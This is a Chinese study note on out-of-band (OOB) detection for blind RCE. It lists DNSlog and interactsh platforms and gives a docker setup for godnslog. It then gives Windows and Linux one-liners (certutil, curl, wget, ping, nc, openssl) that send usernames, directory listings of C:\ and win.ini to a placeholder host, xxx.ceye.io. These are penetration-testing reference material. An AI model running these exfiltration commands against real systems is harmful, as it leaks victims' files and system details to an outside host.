学习笔记-OOB
OOB
免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
相关文章
- 带外通道技术(OOB)总结
- OOB(out of band)分析系列之DNS渗漏
- Burpsuite之BurpCollaborator模块介绍
- Persistent Access to Burp Suite Sessions - Step-by-Step Guide
- Burp Collaborator
- HTTP BLIND
- Cracking the lens: targeting HTTP's hidden attack-surface
- System Hardening을 피해 RCE를 탐지하기 위한 OOB 방법들
- ping 命令跨平台探测无回显 RCE 技巧
在线监控平台
相关工具
- uknowsec/SharpNetCheck - 该工具可以在 dnslog 中回显内网 ip 地址和计算机名,可实现内网中的快速定位可出网机器
- ztgrace/mole - 识别和利用out-of-band (OOB)漏洞的burp扩展
平台搭建
平台
- BugScanTeam/DNSLog - DNSLog 是一款监控 DNS 解析记录和 HTTP 访问记录的工具
- lanyi1998/DNSlog-GO - DNSLog-GO 是一款 golang 编写的监控 DNS 解析记录的工具,自带 WEB 界面
- chennqqi/godnslog
docker pull "sort/godnslog" docker run -p80:8080 -p53:53/udp "sort/godnslog" serve -domain yourdomain.com -4 100.100.100.100 # yourdomain.com 替换为你的域名 100.100.100.100 替换为你的公网IP - yumusb/DNSLog-Platform-Golang - DNSLOG平台 golang 一键启动版
- phith0n/conote-community - Conote 综合安全测试平台社区版
- projectdiscovery/interactsh - An OOB interaction gathering server and client library
- Buzz2d0/Hyuga - 一个用来检测带外(Out-of-Band)流量(DNS查询和HTTP请求)的监控工具
- AbelChe/cola_dnslog
- AlphabugX/Alphalog
- Li4n0/revsuit - RevSuit is a flexible and powerful reverse connection platform designed for receiving connection from target host in penetration.
Windows
-
ping
ping %USERNAME%.xxx.ceye.io ping -nc 4 %USERNAME%.xxx.ceye.io -
certutil
使用 certutil 请求证书文件,并将下载文件重定向到 nul,无缓存、无需浏览器实现发起 http 请求
for /F %x in ('dir /b c:\') do certutil -urlcache -split -f "http://xxx.ceye.io/?result=%x" nul -
curl
windows 环境默认是支持 curl 的
for /F %x in ('dir /b c:\') do curl http://xxx.ceye.io/%x curl -F file=@C:\windows\win.ini http://xxx.ceye.io
linux
-
curl
curl http://xxx.ceye.io/%x -
wget
wget http://xxx.ceye.io/%x -
ping
linux 默认 ping 不带 -c 参数是会导致无限ping下去的,一定要带 -c
ping -c 4 xxx.ceye.io ping -nc 4 xxx.ceye.io -
openssl
openssl s_client -connect xxx.ceye.io:80 -
nc
echo -e "GET / HTTP/1.1\nHost: http://xxx.ceye.io/%x\n\n" | nc xxx.ceye.io 80 -
dig
dig xxx.ceye.io
点击关注,共同学习!
安全狗的自我修养
